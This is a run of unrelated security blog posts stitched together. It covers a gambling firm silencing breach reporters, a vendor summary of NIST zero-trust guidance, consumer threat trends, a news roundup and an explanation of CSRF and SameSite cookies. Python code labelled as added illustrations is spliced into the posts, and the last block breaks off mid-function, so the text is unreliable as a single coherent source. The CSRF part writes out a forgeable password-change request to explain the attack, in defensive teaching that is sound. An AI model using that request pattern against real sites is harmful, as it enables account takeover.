So it's back to Twitter to DM them again, however...


And that's when I decided to write this blog post. 8 days after first attempting to alert them privately to a serious security incident that would not only impact their customers but also impact their own business interests, they decided that this was the most appropriate course of action:

Now remember, this is a company that handles other people's money! Granted, gambling merely amounts to a tax on people who can't do maths but regardless, you'd expect at least a vague attempt at professionalism. It wasn't just me that was blocked either; I was originally alerted to Surebet247's propensity to silence bearers of bad news by Tefo who'd just discovered he'd lost his primary channel of communication with them. It wasn't just us either; they were on a rampage to drown out other voices they didn't like too:

And now here we are, Streisand'd all over the place.

The Streisand effect is a phenomenon whereby an attempt to hide, remove, or censor a piece of information has the unintended consequence of publicizing the information more widely, usually facilitated by the Internet.

Because of Surebet247's attempts to censor discussion on this incident, they're getting more of it than ever with the press now starting to jump onto it well beyond Tefo's initial 3 stories:

Bad corporate behaviour like this is no longer something you simply sweep under the rug; it needs to be broadcast far and wide as a cautionary tale for the next organisation that elects to follow the same strategy. Per my earlier tweet about data breach grief, the outcome of this process is a foregone conclusion and assuming I haven't made a massive series of errors in the workings explained above, Surebet247 will ultimately come clean about the breach and take responsibility for their actions.

I'll leave you with a quote I've said many times now and it's more relevant in this situation than ever before:

We are now in an era where people are no longer judging organisations as harshly because they had a breach, but are judging them more on the way they handle it.

An Overview of Zero Trust Architecture, According to NIST

NIST recently released a draft publication, SP 800-207: Zero Trust Architecture (ZTA), an overview of a new approach to network security.

While ZTA is already present in many cybersecurity policies and programs that sought to restrict access to data and resources, this document is intended to both “abstractly define” ZTA and provide more guidance on deployment models, use cases and roadmaps to implementation.

What’s the problem they’re trying to solve? Agencies and enterprise networks have given authorized users broad access to resources, since they’ve traditionally focused on perimeter defenses. But that’s led to lateral movement within the network – one of the biggest security challenges for federal agencies.

Realistically, NIST recognizes that the migration to a ZTA is more of a journey rather than a complete replacement of an enterprise’s infrastructure. Most enterprises will likely continue to operate in a hybrid model – of both zero trust + legacy mode – for a while as they continue their IT modernization investments.

And despite the misleading name, they state that ZTA is not a single network architecture, but rather a set of guiding principles.

The overall design denotes:

  • A shift away from wide network perimeters to a narrower focus on protecting individual or small groups of resources
  • No implicit trust is granted to systems based on their physical or network location

While traditional methods block attacks coming from the internet, they may not be effective at detecting or blocking attacks originating from inside the network.

ZTA seeks to focus on the crux of the issue, which NIST defines as two main objectives:

  1. Eliminate unauthorized access to data and services
  2. Make the access control enforcement as granular as possible

Zero Trust Architecture Tenets

NIST lists out a few conceptual guidelines that the design and deployment of a ZTA should align with (summarized for brevity below):

  1. All data and computing services are considered resources. For example, an enterprise might classify personally-owned devices as resources, if they’re allowed to access enterprise resources.
  2. All communication is secure regardless of network location. This means access requests from within the network must meet the same security requirements as those from outside of it, and communication must be encrypted and authenticated.
  3. Access to individual enterprise resources is granted on a per-connection basis. The trust of whatever is requesting access is evaluated before access is granted – authentication to one resource doesn’t automatically mean they get access to another resource.
  4. Access to resources is determined by policy, including the state of user identity and the requesting system, and may include other behavioral attributes. NIST defines ‘user identity’ as a network account used to request access, plus any enterprise-assigned attributes to that account. A ‘requesting system’ refers to device characteristics (software versions, network location, etc.). ‘Behavioral attributes’ include user & device analytics, any behavior deviations from baselined patterns.
  5. The enterprise ensures all owned and associated systems are in the most secure state possible, while monitoring systems to ensure they remain secure. Enterprises need to monitor the state of systems and apply patches or fixes as needed – any systems discovered to be vulnerable or non-enterprise owned may be denied access to enterprise resources.
  6. User authentication is dynamic and strictly enforced before access is allowed. NIST refers to this as a ‘constant cycle of access’ of threat assessment and continuous authentication, requiring user provisioning and authorization (the use of MFA for access to enterprise resources), as well as continuous monitoring and re-authentication throughout user interaction.
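Tenets 3 through 6 describe a decision that is made per request rather than once at the perimeter. The following Python block is an added illustration of that decision loop; it is not code from NIST or Cisco, and every name in it (the request and policy classes, the two sample resources, the "alice" identity and her device) is a constructed assumption. It evaluates user identity, MFA state, authentication age, device ownership and patch level, and a behavioral deviation score against a per-resource policy, defaulting to deny when no policy exists. The same user on the same device is allowed one resource and denied another, which is the point of tenet 3.

```python
"""Per-request access decision in the spirit of NIST SP 800-207 tenets 3-6.

Added illustration only: not code from NIST or from any Cisco product. All
class names, policy values and the sample identity below are assumptions.
"""
from __future__ import annotations
from dataclasses import dataclass


@dataclass
class UserIdentity:
    account: str
    groups: set[str]            # enterprise-assigned attributes (tenet 4)
    mfa_verified: bool          # tenet 6: MFA completed for this session
    auth_age_seconds: int       # seconds since the user last authenticated


@dataclass
class DeviceState:
    device_id: str
    enterprise_owned: bool      # tenet 5: non-enterprise devices may be denied
    patch_level: int            # tenet 5: current patch state
    network_location: str       # recorded for logging only; never a basis for trust (tenet 2)


@dataclass
class Behavior:
    deviation_score: float      # 0.0 = matches baseline, 1.0 = fully anomalous (tenet 4)


@dataclass
class AccessRequest:
    user: UserIdentity
    device: DeviceState
    behavior: Behavior
    resource: str


@dataclass
class ResourcePolicy:
    allowed_groups: set[str]
    min_patch_level: int
    require_enterprise_device: bool
    max_auth_age_seconds: int   # forces re-authentication for sensitive resources
    max_deviation: float


class PolicyEngine:
    """Evaluates every request independently; there is no session-wide grant."""

    def __init__(self, policies: dict[str, ResourcePolicy]):
        self.policies = policies

    def decide(self, req: AccessRequest) -> tuple[bool, list[str]]:
        policy = self.policies.get(req.resource)
        if policy is None:
            return False, ["no policy for resource; default deny"]
        reasons: list[str] = []
        if not req.user.groups & policy.allowed_groups:
            reasons.append("user not in allowed group")
        if not req.user.mfa_verified:
            reasons.append("MFA not verified")
        if req.user.auth_age_seconds > policy.max_auth_age_seconds:
            reasons.append("authentication too old; re-authenticate")
        if policy.require_enterprise_device and not req.device.enterprise_owned:
            reasons.append("non-enterprise device")
        if req.device.patch_level < policy.min_patch_level:
            reasons.append("device below required patch level")
        if req.behavior.deviation_score > policy.max_deviation:
            reasons.append("behavior deviates from baseline")
        return (not reasons), reasons


# Constructed sample policies for two hypothetical resources.
ENGINE = PolicyEngine({
    "wiki": ResourcePolicy(allowed_groups={"staff"}, min_patch_level=3,
                           require_enterprise_device=False,
                           max_auth_age_seconds=8 * 3600, max_deviation=0.8),
    "hr-payroll": ResourcePolicy(allowed_groups={"hr"}, min_patch_level=5,
                                 require_enterprise_device=True,
                                 max_auth_age_seconds=15 * 60, max_deviation=0.3),
})


def example_decisions() -> dict[str, tuple[bool, list[str]]]:
    """Same user and device against three resources; each request is judged on its own."""
    user = UserIdentity("alice", {"staff", "hr"}, mfa_verified=True, auth_age_seconds=3600)
    device = DeviceState("laptop-42", enterprise_owned=True, patch_level=4,
                         network_location="corp-lan")
    behavior = Behavior(deviation_score=0.1)
    return {r: ENGINE.decide(AccessRequest(user, device, behavior, r))
            for r in ("wiki", "hr-payroll", "finance-db")}


if __name__ == "__main__":
    for resource, (allowed, reasons) in example_decisions().items():
        print(f"{resource:12} -> {'ALLOW' if allowed else 'DENY'} {reasons}")
```

Note that `network_location` is carried on the device record so it can be logged and fed to analytics, but it never appears in a grant condition; that is what "no implicit trust based on network location" looks like in code. The `hr-payroll` denial is returned with both failing checks so the reasons can be logged, which is what a monitoring pipeline needs to distinguish a stale session from an unpatched device.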

Zero Trust Architecture Threats

What follows is a summary of some of the key potential ZTA threats listed in the publication:

Insider Threat

To reduce the risk of an insider threat, a ZTA can:

  • Prevent a compromised account or system from accessing resources outside of how it’s intended
  • Require MFA for network access to reduce the risk of access from a compromised account
  • Prevent compromised accounts or systems from moving laterally through the network
  • Use context to detect any access activity outside of the norm and block account or system access

To prevent the threat of unauthorized access, Duo provides MFA for every application, as part of the Cisco Zero Trust framework. An additional layer of identity verification can help mitigate attacker access using stolen passwords or brute-force attacks. That paired with Duo’s device insight and policies provides a solid foundation for zero trust for the workforce.

Learn more about Duo’s new federal editions tailored to align with:

  • FedRAMP/FISMA security controls
  • NIST’s Digital Identity Guidelines (NIST SP 800-63-3)
  • FIPS 140-2 compliance

See more about FedRAMP authorized authentication, providing secure application access for federal agencies and other public sector customers, including role/location-based access policies, biometric authentication, and more.

Network Visibility

In a ZTA, all traffic should be inspected, logged and analyzed to identify and respond to network attacks against the enterprise. But some enterprise network traffic may be difficult to monitor, as it comes from third-party systems or applications that cannot be examined due to encrypted traffic.

In this situation, NIST recommends collecting encrypted traffic metadata and analyzing it to detect malware or attackers on the network. It also references Cisco’s research on machine learning techniques for encrypted traffic (section 5.4, page 22):

“The enterprise can collect metadata about the encrypted traffic and use that to detect possible malware communicating on the network or an active attacker. Machine learning techniques [Anderson] can be used to analyze traffic that cannot be decrypted and examined. Employing this type of machine learning would allow the enterprise to categorize traffic as valid or possibly malicious and subject to remediation.”

Cisco Encrypted Traffic Analytics (ETA) allows you to detect and mitigate network threats in encrypted traffic to gain deeper insight without decryption. It also allows you to quickly contain infected devices and users, while securing your network. Paired with Cisco Stealthwatch, you can get real-time monitoring using machine learning and context-aware analysis.
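The NIST passage above is abstract about what "metadata about the encrypted traffic" means in practice. The following Python block is an added example of the idea, not code from NIST, Cisco ETA or Stealthwatch: it takes flow records carrying only features observable without decryption (TLS version, number of cipher suites offered, whether an SNI was present, average client packet length, client-to-server byte ratio and the coefficient of variation of packet inter-arrival times), scales them, and classifies a new flow by its distance to the centroid of constructed "benign" and "suspicious" training flows. The feature names, the training flows and the thresholds they imply are all constructed assumptions; a production system would learn from far more data and more features, but the mechanism is the same.

```python
"""Nearest-centroid classification of encrypted flows from metadata alone.

Added illustration: not the technique used by any named product, and all flow
records below are constructed sample data, not captures.
"""
from __future__ import annotations
import math

TLS_VERSION_SCORE = {"1.0": 1, "1.1": 2, "1.2": 3, "1.3": 4}
FEATURE_NAMES = ["tls_version", "ciphers_offered", "sni_present",
                 "avg_client_pkt_len", "client_server_byte_ratio", "interarrival_cv"]


def extract_features(flow: dict) -> list[float]:
    """Turn one flow-metadata record into a numeric feature vector (no payload needed)."""
    return [
        float(TLS_VERSION_SCORE[flow["tls_version"]]),
        float(flow["ciphers_offered"]),
        1.0 if flow["sni_present"] else 0.0,
        float(flow["avg_client_pkt_len"]),
        float(flow["client_server_byte_ratio"]),
        float(flow["interarrival_cv"]),   # low value = regular timing, typical of beacons
    ]


# Constructed labelled training flows. Benign: modern TLS, rich cipher list, SNI,
# large irregular transfers. Suspicious: old TLS, tiny cipher list, no SNI,
# small regularly timed client-heavy traffic.
TRAINING = {
    "benign": [
        {"tls_version": "1.3", "ciphers_offered": 16, "sni_present": True,
         "avg_client_pkt_len": 900, "client_server_byte_ratio": 0.20, "interarrival_cv": 1.5},
        {"tls_version": "1.3", "ciphers_offered": 18, "sni_present": True,
         "avg_client_pkt_len": 850, "client_server_byte_ratio": 0.25, "interarrival_cv": 1.3},
        {"tls_version": "1.2", "ciphers_offered": 14, "sni_present": True,
         "avg_client_pkt_len": 950, "client_server_byte_ratio": 0.15, "interarrival_cv": 1.7},
    ],
    "suspicious": [
        {"tls_version": "1.0", "ciphers_offered": 3, "sni_present": False,
         "avg_client_pkt_len": 120, "client_server_byte_ratio": 1.0, "interarrival_cv": 0.10},
        {"tls_version": "1.1", "ciphers_offered": 4, "sni_present": False,
         "avg_client_pkt_len": 130, "client_server_byte_ratio": 0.9, "interarrival_cv": 0.05},
        {"tls_version": "1.0", "ciphers_offered": 2, "sni_present": False,
         "avg_client_pkt_len": 110, "client_server_byte_ratio": 1.1, "interarrival_cv": 0.12},
    ],
}


class CentroidClassifier:
    """Min-max scales features, then labels a flow by the nearest class centroid."""

    def __init__(self, training: dict[str, list[dict]]):
        vectors = [extract_features(f) for flows in training.values() for f in flows]
        self.lo = [min(v[i] for v in vectors) for i in range(len(FEATURE_NAMES))]
        self.hi = [max(v[i] for v in vectors) for i in range(len(FEATURE_NAMES))]
        self.centroids = {}
        for label, flows in training.items():
            scaled = [self._scale(extract_features(f)) for f in flows]
            self.centroids[label] = [sum(s[i] for s in scaled) / len(scaled)
                                     for i in range(len(FEATURE_NAMES))]

    def _scale(self, vec: list[float]) -> list[float]:
        return [(x - lo) / (hi - lo) if hi != lo else 0.0
                for x, lo, hi in zip(vec, self.lo, self.hi)]

    def distances(self, flow: dict) -> dict[str, float]:
        s = self._scale(extract_features(flow))
        return {label: math.sqrt(sum((a - b) ** 2 for a, b in zip(s, c)))
                for label, c in self.centroids.items()}

    def classify(self, flow: dict) -> str:
        d = self.distances(flow)
        return min(d, key=d.get)


CLASSIFIER = CentroidClassifier(TRAINING)

# Constructed flows to score; neither appears in the training set.
SAMPLE_FLOWS = {
    "beacon_like": {"tls_version": "1.2", "ciphers_offered": 4, "sni_present": False,
                    "avg_client_pkt_len": 150, "client_server_byte_ratio": 0.9, "interarrival_cv": 0.15},
    "browser_like": {"tls_version": "1.3", "ciphers_offered": 14, "sni_present": True,
                     "avg_client_pkt_len": 800, "client_server_byte_ratio": 0.3, "interarrival_cv": 1.2},
}


def classify_samples() -> dict[str, str]:
    """Label each constructed sample flow; used as the worked result of this example."""
    return {name: CLASSIFIER.classify(flow) for name, flow in SAMPLE_FLOWS.items()}


if __name__ == "__main__":
    for name, label in classify_samples().items():
        print(f"{name:13} -> {label}  {CLASSIFIER.distances(SAMPLE_FLOWS[name])}")
```

The beacon-like flow is labelled suspicious even though it uses TLS 1.2, because the remaining metadata (no SNI, four cipher suites, small client-heavy packets at near-constant intervals) pulls it toward that centroid. That is the practical point of the NIST text: none of these features require the session key, so the analysis works on traffic that cannot be decrypted, and a flagged flow can then be handed to a packet-capture or endpoint tool for confirmation rather than acted on blindly.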

Zero Trust Architecture: Continuous Monitoring

The publication also references having a strong Continuous Diagnostics and Mitigation (CDM) program as “key to the success of ZTA.”

In practice this means a complete inventory of physical and virtual assets. In order to protect systems, agencies need insight into everything on their infrastructure:

  • What’s connected? The devices, applications and services used; as well as the security posture, vulnerabilities and threats associated.
  • Who’s using the network? The internal and external users, including any (non-person) entities acting autonomously, like service accounts that interact with resources.
  • What is happening on the network? Insight into the traffic patterns, messages and communication between systems.
  • How is data protected? Enterprise policies for how information is protected, both at rest and in transit.

Having visibility into the different areas of connectivity and access provides a baseline to start evaluating and responding to activity on and off the network.

Cisco Zero Trust

Asking the above discovery questions and finding a solution that can accurately and comprehensively answer them can be challenging, as it requires user, device, system and application telemetry that spans your entire IT environment – from the local corporate network to branches to the multi-cloud; encompassing all types of users from employees to vendors to contractors to remote workers, etc.

Get visibility into everything on your infrastructure, and get control over who can access what, on an ongoing basis. Cisco Zero Trust provides a comprehensive approach to securing all access across your applications and environment, from any user, device and location. It protects your workforce, workloads and workplace.

It comprises three primary products:

  • To protect the workforce, Duo Security ensures that only the right users and secure devices can access applications.
  • To protect workloads, Tetration secures all connections within your apps, across multi-cloud.
  • To protect the workplace, SD-Access secures all user and device connections across your network, including IoT.

This complete zero-trust security model allows you to mitigate, detect and respond to risks across your environment. Verifying trust before granting access across your applications, devices and networks can help protect against identity-based and other access security risks.

Cisco was recently named a leader in The Forrester Wave™: Zero Trust eXtended Ecosystem Platform Providers, Q4 2019. Read the report to learn more about our market leadership in current zero-trust offerings and strategy.

The post An Overview of Zero Trust Architecture, According to NIST appeared first on Cisco Blogs.

The Everyday Cyber Threat Landscape: Trends from 2019 to 2020

The past 12 months have been another bumper year for cybercrime affecting everyday users of digital technology. Trend Micro blocked more than 26.8 billion of these threats in the first half of 2019 alone. The bad news is that there are many more out there waiting to steal your personal data for identity fraud, access your bank account, hold your computer to ransom, or extort you in other ways.

To help you stay safe over the coming year we’ve listed some of the biggest threats from 2019 and some trends to keep an eye on as we hit the new decade. As you’ll see, many of the most dangerous attacks will look a lot like the ones we warned about in 2019.

As we enter 2020 the same rules apply: stay alert, stay sceptical, and stay safe by staying protected.

Top five threats of 2019

Cybercrime is a chaotic, volatile world. So to make sense of the madness of the past 12 months, we’ve broken down the main types of threats consumers encountered into five key areas:

Home network threats: Our homes are increasingly powered by online technologies. Over two-thirds (69%) of US households now own at least one smart home device: everything from voice assistant-powered smart speakers to home security systems and connected baby monitors. But gaps in protection can expose them to hackers. As the gateway to our home networks, routers are particularly at risk. It’s a concern that 83% are vulnerable to attack. There were an estimated 105m smart home attacks in the first half of 2019 alone.

Endpoint threats: These are attacks aimed squarely at you the user, usually via the email channel. Trend Micro detected and blocked more than 26 billion such email threats in the first half of 2019, nearly 91% of the total number of cyber-threats. These included phishing attacks designed to trick you into clicking on a malicious link to steal your personal data and log-ins or begin a ransomware download. Or they could be designed to con you into handing over your personal details, by taking you to legit-looking but spoofed sites. Endpoint threats sometimes include social media phishing messages or even legitimate websites that have been booby-trapped with malware.

Mobile security threats: Hackers are also targeting our smartphones and tablets with greater gusto. Malware is often unwittingly downloaded by users, since it’s hidden in normal-looking Android apps, like the Agent Smith adware that infected over 25 million handsets globally this year. Users are also extra-exposed to social media attacks and those leveraging unsecured public Wi-Fi when using their devices. Once again, the end goal for the hackers is to make money: either by stealing your personal data and log-ins; flooding your screen with adverts; downloading ransomware; or forcing your device to contact expensive premium rate phone numbers that they own.

Online accounts under attack: Increasingly, hackers are after our log-ins: the virtual keys that unlock our digital lives. From Netflix to Uber, webmail to online banking, access to these accounts can be sold on the dark web or they can be raided for our personal identity data. Individual phishing attacks are one way to get these log-ins. But an increasingly popular method in 2019 was to use automated tools that try tens of thousands of previously breached log-ins to see if any of them work on your accounts. From November 2017 through the end of March 2019, over 55 billion such attacks were detected.

Breaches are everywhere: The raw materials needed to unlock your online accounts and help scammers commit identity fraud are stored by the organizations you interact with online. Unfortunately, these companies continued to be successfully targeted by data thieves in 2019. As of November 2019, there were over 1,200 recorded breaches in the US, exposing more than 163 million customer records. Even worse, hackers are now stealing card data direct from the websites you shop with as they are entered in, via “digital skimming” malware.

What to look out for in 2020

Smart homes under siege: As we invest more money in smart gadgets for our families, expect hackers to double down on network attacks. There’s a rich bounty for those that do: they can use an exposed smart endpoint as a means to sneak into your network and rifle through your personal data and online accounts. Or they could monitor your house via hacked security cameras to understand the best time to break in. Your hacked devices could even be recruited into botnets to help the bad guys attack others.

Social engineering online and by phone: Attacks that target user credulity are some of the most successful. Expect them to continue in 2020: both traditional phishing emails and a growing number of phone-based scams. Americans are bombarded by 200 million automated “robocalls” each day, 30% of which are potentially fraudulent. Sometimes phone fraud can shift quickly online; for example, tech support scams that convince the user there’s something wrong with their PC. Social engineering can also be used to extort money, such as in sextortion scams designed to persuade victims that the hacker has and is about to release a webcam image of them in a “compromising position.” Trend Micro detected a 319% increase in these attacks from 2H 2018 to the first half of 2019.

Threats on the move: Look out for more mobile threats in 2020. Many of these will come from unsecured public Wi-Fi which can let hackers eavesdrop on your web sessions and steal identity data and log-ins. Even public charging points can be loaded with malware, something LA County recently warned about. This comes on top of the escalating threat from malicious mobile apps.

All online accounts are fair game: Be warned that almost any online account you open and store personal data in today will be a target for hackers tomorrow. For 2020, this means of course you will need to be extra careful about online banking. But also watch out for attacks on gaming accounts. Not only your personal identity data and log-ins but also lucrative in-game tokens will become highly sought after. Twelve billion of those recorded 55 billion credential stuffing attacks were directed at the gaming industry.

Worms make a comeback: Computer worms are dangerous because they self-replicate, allowing hackers to spread attacks without user interaction. This is what happened with the WannaCry ransomware attacks of 2017. A Microsoft flaw known as BlueKeep offers a new opportunity to cause havoc in 2020. There may be more out there.

How to stay safe

Given the sheer range of online threats facing computer users in 2020, you’ll need to cover all bases to keep your systems and data safe. That means:

Protecting the smart home with network monitoring solutions, regular checks for security updates on gadgets/router, changing the factory default logins to strong passwords, and putting all gadgets onto a guest network.

Tackling data-stealing malware, ransomware and other worm-style threats with strong AV from a reputable vendor, regular patching of your PC/mobile device, and strong password security (as given below).

Staying safe on the move by always using VPNs with public Wi-Fi, installing AV on your device, only frequenting official app stores, and ensuring you’re always on the latest device OS version. And steer clear of public USB charging points.

Keeping accounts secure by using a password manager for creating and storing strong passwords and/or switching on two-factor authentication where available. This will stop credential stuffing in its tracks and mitigate the impact of a third-party breach of your log-ins. Also, never log in to webmail or other accounts on shared computers.

Taking on social engineering by never clicking on links or opening attachments in unsolicited emails, texts or social media messages and never giving out personal info over the phone.

How Trend Micro can help

Fortunately, Trend Micro fully understands the multiple sources for modern threats. It offers a comprehensive range of security products to protect all aspects of your digital life — from your smart home, home PCs, and mobile devices to online accounts including email and social networks, as well as when browsing the web itself.

Trend Micro Home Network Security: Provides protection against network intrusions, router hacks, web threats, dangerous file downloads and identity theft for every device connected to the home network.

Trend Micro Security: Protects your PCs and Macs against web threats, phishing, social network threats, data theft, online banking threats, digital skimmers, ransomware and other malware. Also guards against over-sharing on social media.

Trend Micro Mobile Security: Protects against malicious app downloads, ransomware, dangerous websites, and unsafe Wi-Fi networks.

Trend Micro Password Manager: Provides a secure place to store, manage and update your passwords. It remembers your log-ins, enabling you to create long, secure and unique credentials for each site/app you need to sign in to.

Trend Micro WiFi Protection: Protects you on unsecured public WiFi by providing a virtual private network (VPN) that encrypts your traffic and ensures protection against man-in-the-middle (MITM) attacks.

Trend Micro ID Security (Android, iOS): Monitors underground cybercrime sites to securely check if your personal information is being traded by hackers on the Dark Web and sends you immediate alerts if so.


This Week in Security News: Latest Cyber Risk Index Shows Elevated Risk of Cyber Attack and IoT Company Wyze Exposes Information of 2.4M Customers

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about Trend Micro’s Cyber Risk Index (CRI) and its results showing increased cyber risk. Also, read about a data breach from IoT company Wyze that exposed information of 2.4 million customers.

Read on:

The 5 New Year’s Tech Resolutions You Should Make for 2020

Now is the perfect time to reflect on the past and think of all the ways you can make this coming year your best one yet. With technology playing such a central role in our lives, technology resolutions should remain top of mind heading into the new year. In this blog, Trend Micro shares five tech resolutions that will help make your 2020 better and safer.

Security Study: Businesses Remain at Elevated Risk of Cyber Attack

Elevated risk of cyber attack is due to increased concerns over disruption or damages to critical infrastructure, according to Trend Micro’s latest Cyber Risk Index (CRI) study. The company commissioned Ponemon Institute to survey more than 1,000 organizations in the U.S. to assess business risk based on their current security postures and perceived likelihood of attack.

Parental Controls – Trend Micro Home Network Security Has Got You Covered

In the second blog of a three-part series on security protection for your home and family, Trend Micro discusses the risks associated with children beginning to use the internet for the first time and how parental controls can help protect them.

Cambridge Analytica Scandal: Facebook Hit with $1.6 Million Fine

The Cambridge Analytica scandal continues to haunt Facebook. The company has been receiving fines for its blatant neglect and disregard towards users’ privacy. The latest to join the bandwagon after the US, Italy, and the UK is the Brazilian government.

Why Running a Privileged Container in Docker is a Bad Idea

Privileged containers in Docker are containers that have all the root capabilities of a host machine, allowing the ability to access resources which are not accessible in ordinary containers. In this blog post, Trend Micro explores how running a privileged, yet unsecure, container may allow cybercriminals to gain a backdoor in an organization’s system.

IoT Company Wyze Leaks Emails, Device Data of 2.4M

An exposed Elasticsearch database, owned by Internet of Things (IoT) company Wyze, was discovered leaking connected device information and emails of millions of customers. Exposed on Dec. 4 until it was secured on Dec. 26, the database contained customer emails along with camera nicknames, WiFi SSIDs (Service Set Identifiers; or the names of Wi-Fi networks), Wyze device information, and body metrics.

Looking into Attacks and Techniques Used Against WordPress Sites

WordPress is estimated to be used by 35% of all websites today, making it an ideal target for threat actors. In this blog, Trend Micro explores different kinds of attacks against WordPress – by way of payload examples observed in the wild – and how attacks have used hacked admin access and API, Alfa-Shell deployment, and SEO poisoning to take advantage of vulnerable sites.

FPGA Cards Can Be Abused for Faster and More Reliable Rowhammer Attacks

In a new research paper published on the last day of 2019, a team of American and German academics showed that field-programmable gate array (FPGA) cards can be abused to launch better and faster Rowhammer attacks. The new research expands on previous work into an attack vector known as Rowhammer, first detailed in 2014.

Emotet Attack Causes Shutdown of Frankfurt’s IT Network

The city of Frankfurt, Germany, became the latest victim of Emotet after an infection forced it to close its IT network. There were also incidents that occurred in the German cities of Gießen, Bad Homburg and Freiburg.

BeyondProd Lays Out Security Principles for Cloud-Native Applications

BeyondCorp was first to shift security away from the perimeter and onto individual users and devices. Now, it is BeyondProd that protects cloud-native applications that rely on microservices and communicate primarily over APIs, because firewalls are no longer sufficient. Greg Young, vice president of cybersecurity at Trend Micro, discusses BeyondProd’s value in this article.

How MITRE ATT&CK Assists in Threat Investigation

In 2013, the MITRE Corporation, a federally funded not-for-profit company that counts cybersecurity among its key focus area, came up with MITRE ATT&CK™, a curated knowledge base that tracks adversary behavior and tactics. In this analysis, Trend Micro investigates an incident involving the MyKings botnet to show how the MITRE ATT&CK framework helps with threat investigation.

TikTok Banned by U.S. Army Over China Security Concerns

With backlash swelling around TikTok’s relationship with China, the United States Army this week announced that U.S. soldiers can no longer have the social media app on government-owned phones. The United States Army had previously used TikTok as a recruiting tool for reaching younger users,

Mobile Money: How to Secure Banking Applications

Mobile banking applications that help users check account balances, transfer money, or pay bills are quickly becoming standard products provided by established financial institutions. However, as these applications gain ground in the banking landscape, cybercriminals are not far behind.

What security controls do you have in place to protect your home and family from risks associated with children who are new internet users? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Promiscuous Cookies and Their Impending Death via the SameSite Policy

Cookies like to get around. They have no scruples about where they go save for some basic constraints relating to the origin from which they were set. I mean have a think about it:

If a website sets a cookie then you click a link to another page on that same site, will the cookie be automatically sent with the request? Yes.

What if an attacker sends you a link to that same website in a malicious email and you click that link, will the cookie be sent? Also yes.

Last one: what if an attacker directs you to a malicious website and upon visiting it your browser makes a POST request to the original website that set the cookie - will that cookie still be sent with the request? Yes!

Cookies just don't care about how the request was initiated nor from which origin, all they care about is that they're valid for the requested resource. "Origin" is a key word here too; those last two examples above are "cross-origin" requests in that they were initiated from origins other than the original website that set the cookie. Problem is, that opens up a rather nasty attack vector we know as Cross Site Request Forgery or CSRF. Way back in 2010 I was writing about this as part of the OWASP Top 10 for ASP.NET series and a near decade on, it's still a problem. Imagine this request:

POST https://hack-yourself-first.com/Account/ChangePassword
Cookie: AuthCookie=EF29...

NewPassword: passw0rd
ConfirmPassword: passw0rd

This is a real request from my Hack Yourself First website I use as part of the workshops Scott Helme and I run. You can go and create an account there then try to change the password and watch the request that's sent via your browser's dev tools. Then, ask yourself the question: what does the HTTP request need to look like in order to change the user's password? There are only 3 requirements:

  1. It needs to be a POST request
  2. It needs to be sent to the URL on the first line
  3. It needs to have 2 fields in the body called NewPassword and ConfirmPassword

That is all. It doesn't matter if the request is initiated from the website itself or from an external location, for example an attacker's website. If that malicious site can force the browser into making a POST request to that URL with that form data, the password is changed. Why is this possible? Because the auth cookie is sent with the request regardless of where it's initiated from, and that is how a CSRF attack works.

We (the industry) tackled this risk by applying copious amounts of sticky tape we refer to as anti-forgery tokens. By way of example, here's what the request to perform a domain search for troyhunt.com on HIBP looks like:

POST https://haveibeenpwned.com/DomainSearch
.AspNet.ApplicationCookie=BjzGJ4...
__RequestVerificationToken=B0kTW2...

DomainName: troyhunt.com
__RequestVerificationToken: Llx764...

There are two anti-forgery tokens passed in the request, one in a cookie and one in the body, both called "__RequestVerificationToken". They're not identical but they're paired such that when the server receives the request it checks to see if both values exist and belong together. If not, the request is rejected. This works because whilst the one in the cookie will be automatically sent with the request regardless of its origin, in a forged request scenario the one in the body would need to be provided by the attacker and they have no idea what the value should be. The browser's security model ensures there's no way for the attacker to cause the victim's browser to visit the target site, generate the token in the HTML and then pull it out of the browser in a way the malicious actor can access. At least not without a cross site scripting vulnerability as well, and that's a whole different class of vulnerability with different defences.
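As an added illustration of the pairing check described above (my own example, not code from the post or from ASP.NET's implementation), here is a minimal server-side gate in Python: the cookie token is random and the body token is an HMAC of it under a server secret, so the two must belong together and only the server can mint a matching pair. The secret, the "AuthCookie" value and the demo requests are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Server-held secret that pairs the two tokens. Constructed for this example;
# a real deployment loads it from protected configuration, never from source.
SERVER_SECRET = b"example-only-secret-change-me"

TOKEN_NAME = "__RequestVerificationToken"  # the name used in the request above


def issue_tokens(secret: bytes = SERVER_SECRET) -> Tuple[str, str]:
    """Return (cookie_token, form_token) for rendering a form.

    The cookie token is random; the form token is an HMAC of it under the
    server secret. Only the server can produce the form value that matches
    a given cookie value, so the pair "belongs together".
    """
    cookie_token = secrets.token_hex(16)
    form_token = hmac.new(secret, cookie_token.encode(), hashlib.sha256).hexdigest()
    return cookie_token, form_token


def tokens_match(cookie_token: Optional[str], form_token: Optional[str],
                 secret: bytes = SERVER_SECRET) -> bool:
    """Both values must exist and belong together."""
    if not cookie_token or not form_token:
        return False
    expected = hmac.new(secret, cookie_token.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(expected.encode(), form_token.encode())


def accept_change_password(method: str, cookies: Dict[str, str], form: Dict[str, str],
                           secret: bytes = SERVER_SECRET) -> bool:
    """Server-side gate for a state-changing endpoint like /Account/ChangePassword.

    The auth cookie arrives automatically on any request the browser makes to
    the site, so it proves nothing about where the request came from; the
    anti-forgery pair is what ties the request to a form the site itself rendered.
    """
    if method.upper() != "POST":
        return False
    if not cookies.get("AuthCookie"):
        return False
    new_pw = form.get("NewPassword")
    if not new_pw or new_pw != form.get("ConfirmPassword"):
        return False
    return tokens_match(cookies.get(TOKEN_NAME), form.get(TOKEN_NAME), secret)


def demo() -> Dict[str, bool]:
    """Replay the legitimate and forged scenarios from the post with constructed values."""
    cookie_token, form_token = issue_tokens()
    # What the victim's browser attaches automatically, regardless of origin.
    browser_cookies = {"AuthCookie": "EF29-constructed", TOKEN_NAME: cookie_token}
    fields = {"NewPassword": "passw0rd", "ConfirmPassword": "passw0rd"}

    # 1. Form submitted from the site's own page: the body carries the paired token.
    legit = accept_change_password("POST", browser_cookies, {**fields, TOKEN_NAME: form_token})
    # 2. Cross-site POST: the cookie still rides along, but the other origin could
    #    not read the rendered form, so it has no valid body token to send.
    forged = accept_change_password("POST", browser_cookies, dict(fields))
    # 3. A guessed body token fails because it is keyed by a secret the server holds.
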